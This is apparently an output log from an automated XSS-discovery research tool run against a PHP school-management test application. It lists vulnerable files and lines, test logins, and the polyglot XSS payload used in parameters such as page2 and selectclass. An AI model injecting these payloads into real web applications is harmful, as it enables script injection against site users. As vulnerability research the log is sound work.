//START ATTACKS FOUND -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:95 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/Login.php Input: infoupdate=-1 login=-1 logout=-1 page="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" page2=-1 Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578310215/index.php-4627144720.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ='> ">'> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:95 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/TeacherMain.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="teacher" username="teacher" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578320693/index.php-15207964230.xml alert(String.fromCharCode(88,83,83)) document.classes.submit(); window.status='View Information For class1';return true; alert(String.fromCharCode(88,83,83)) class1 semester2 Semester: ='> ">'> ClassName semester1 ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:34 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="1" password="teacher" selectclass="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="teacher" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578321922/index.php-19364393110.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:48 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="teacher" selectclass="1" username="teacher" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578322461/index.php12735786810.xml alert(String.fromCharCode(88,83,83)) document.classes.submit(); window.status='View Information For class1';return true; alert(String.fromCharCode(88,83,83)) class1 semester2 Semester: ='> ">'> ClassName semester1 ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:75 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ViewCourses.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="teacher" selectclass="1" username="teacher" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578327779/index.php12735786810.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ='> ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:87 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/StudentMain.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="student" username="student" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578331069/index.php907458170.xml alert(String.fromCharCode(88,83,83)) window.status='View Information For class2';return true; document.classes.submit(); window.status='View Information For class1';return true; alert(String.fromCharCode(88,83,83)) class1 semester2 Semester: ='> ">'> ClassName semester1 ='/> class2 -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:34 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ViewClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="1" password="student" selectclass="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="student" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578332232/index.php-13744643030.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:46 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ViewClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="student" selectclass="1" username="student" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578332760/index.php-20040961030.xml alert(String.fromCharCode(88,83,83)) window.status='View Information For class2';return true; document.classes.submit(); window.status='View Information For class1';return true; alert(String.fromCharCode(88,83,83)) class1 semester2 Semester: ='> ">'> ClassName semester1 ='/> class2 -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:80 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/StudentViewCourses.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="student" selectclass="1" username="student" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578338040/index.php-20040961030.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ='> ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:106 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentMain.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="parent" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578341006/index.php13133884770.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) student1student1 StudentName ='> ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:54 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentViewStudents.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="parent" student="1" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578350779/index.php10631051180.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ='> ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:13 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentViewCourses.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2=5 password="parent" selectclass="1" student="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578352829/index.php-6236241020.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:60 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentViewCourses.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2=5 password="parent" selectclass="1" student="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578353383/index.php-6236241020.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:82 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentViewCourses.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="parent" selectclass="1" student="1" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220578353982/index.php-20596230740.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) student1student1 StudentName ='> ">'> ='/> //END ATTACKS FOUND attacks:20 no more inputs to explore coveredEchos:26 coveredTaintedEchos:20 time:98966